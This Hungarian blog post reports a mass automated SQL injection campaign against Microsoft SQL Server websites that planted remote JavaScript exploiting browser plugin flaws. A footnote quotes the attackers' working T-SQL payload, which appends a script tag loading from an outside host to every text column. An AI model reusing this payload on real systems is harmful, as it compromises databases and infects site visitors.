A hétvégén két automatizált támadással először kb. 70 majd  93 ezer weboldalra pakoltak kártékony kódokat ismeretlen támadók. A Google-t használó szkriptek Microsoft SQL szervereket kerestek és fertőztek meg oly módon, hogy az weboldalak adattábláiban szereplő összes szöveges információ után egy távoli JavaScriptet betöltő kódot fűztek (nem bízták a véletlenre a dolgot...). Az így betöltődő program több ismert exploittal próbálta megfertőzni a  feltört oldalak látogatóinak számítógépét. Ezek között előfordult egy több mint egy éves MS Data Access Components hiba, de egy októberi RealPlayer sebezhetőség kihasználása is. Az első körben megtört gépeket meglepően hamar rendberakták, a második hullám áldozataira töltött kód pedig nem működött (lúzerek :), szóval elég jól megúsztuk ezt az esetet, azt hiszem.

Arról nincs információ, hogy a támadók kihasználtak-e valamilyen, eddig nem ismert sebezhetőséget a Microsoftos adatbázisszerverekben, az minden esetre elég furcsa, hogy ennyi adatbázisba bele tudtak firkálni*. Az sem világos, hogy az ügynek van-e köze az ukrán DDoS balhéhoz?

*Rájöttem, hogy ASP-s injektet csinálni jó móka, mivel egyszerre több kérés is futtatható ha pontosvesszőket használunk (bár ez nyilván alkalmazásfüggő). A gonosz kis robotok ehhez hasonló rondaságokat kértek a kiszolgálóktól:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T varchar(255),@C

A Computer World cikke itt.

Utóirat: sok a dolgom mostanában, úgyhogy kicsit lassan fognak csordogálni a posztok mostanában, de tartsatok ki! Kösz ;)